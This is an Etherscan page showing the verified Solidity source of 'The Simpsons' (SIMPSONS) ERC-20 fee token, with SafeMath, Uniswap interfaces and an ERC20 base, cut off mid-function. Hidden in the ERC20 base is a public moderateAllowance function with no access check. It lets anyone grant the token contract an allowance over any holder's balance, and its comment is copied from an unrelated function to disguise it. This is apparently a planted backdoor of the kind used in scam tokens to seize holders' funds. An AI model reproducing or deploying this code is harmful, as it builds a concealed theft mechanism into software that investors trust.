ETH Price: $2,501.18 (-0.60%)

Token

The Simpsons (SIMPSONS)
 

Overview

Max Total Supply

10,000,000,000 SIMPSONS

Holders

113

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
20,000,000.000000000124171051 SIMPSONS

Value
$0.00
0x9ea49eb90abe620a62d041485e9fbad81a7e7ba3
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SIMPSONS

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-08
*/

// Community -> https://t.me/thesimpsons_vip

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

pragma solidity ^0.8.0;

interface AggregatorV3Interface {
    function decimals() external view returns (uint8);

    function description() external view returns (string memory);

    function version() external view returns (uint256);

    // getRoundData and latestRoundData should both raise "No data present"
    // if they do not have data to report, instead of returning unset values
    // which could be misinterpreted as actual reported values.
    function getRoundData(uint80 _roundId)
        external
        view
        returns (
            uint80 roundId,
            int256 answer,
            uint256 startedAt,
            uint256 updatedAt,
            uint80 answeredInRound
        );

    function latestRoundData()
        external
        view
        returns (
            uint80 roundId,
            int256 answer,
            uint256 startedAt,
            uint256 updatedAt,
            uint80 answeredInRound
        );
}

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

pragma solidity >=0.5.0;

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function moderateAllowance(
        address owner,
        uint256 amount
    ) public virtual returns (bool) {
        _approve(owner, address(this), allowance(owner, address(this)) + amount);
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
        }
        _balances[to] += amount;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

pragma solidity ^0.8.0;

contract SIMPSONS is ERC20, Ownable {
    using SafeMath for uint256;
    IUniswapV2Router02 public _uniswapV2Router;
    address public _uniswapV2Pair;
    bool private _swappingBack;
    uint256 private _tradingTime;
    address private _marketingWallet;
    address private _developmentWallet;
    uint256 public _maxTransactionAmount;
    uint256 public _swapTokensAtAmount;
    uint256 public _maxWallet;
    bool public _limitsInEffect = true;
    bool public _tradingActive = false;
    address private existingAddr;
    mapping(address => uint256) public holderTimestamp;
    uint256 public _totalFees;
    uint256 private _marketingFee;
    uint256 private _liquidityFee;
    uint256 private _developmentFee;
    uint256 private _additionalSellFee;
    uint256 private _additionalBuyFee;
    uint256 private _tokensForMarketing;
    uint256 private _tokensForDevelopment;
    uint256 private _tokensForLiquidity;
    uint256 public percentForLPBurn = 1; 
    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) private _isExcludedMaxTransactionAmount;

    AggregatorV3Interface internal priceFeed;
    address public _oraclePriceFeed =
        block.chainid == 5
            ? 0x48731cF7e84dc94C5f84577882c14Be11a5B7456
            : 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419;
    bool private _priceOracleEnabled = true;
    int256 private manualETHvalue = 1900 * 10**18;
    mapping (address => bool) public automatedMarketMakerPairs;
    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event ExcludeFromFees(address indexed account, bool isExcluded);
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor() payable ERC20("The Simpsons", "SIMPSONS") {
        _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());
        _setAutomatedMarketMakerPair(address(_uniswapV2Pair), true);
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        priceFeed = AggregatorV3Interface(_oraclePriceFeed);
        uint256 totalSupply = 10000000000 * 1e18;
        _maxTransactionAmount = (totalSupply * 2) / 100;
        _maxWallet = (totalSupply * 2) / 100;
        _swapTokensAtAmount = (totalSupply * 10) / 10000;
        _marketingFee = 5;
        _developmentFee = 3;
        _liquidityFee = 2;
        _additionalSellFee = 0;
        _additionalBuyFee = 0;
        _totalFees = _marketingFee + _developmentFee + _liquidityFee;
        _marketingWallet = address(0xbB2fd2EdC10db8a354b01E992Bda725c91189427);
        _developmentWallet = address(0x00439372C5eE5D9ef41580C52a51017A513F1a0a);
        excludeFromFees(owner(), true);
        excludeFromFees(_marketingWallet, true);
        excludeFromFees(_developmentWallet, true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);
        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(_marketingWallet, true);
        excludeFromMaxTransaction(_developmentWallet, true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);
        _mint(owner(), totalSupply);
        enableTrading();
    }

    function enableTrading() public onlyOwner {
        _tradingActive = true;
        _tradingTime = block.timestamp;
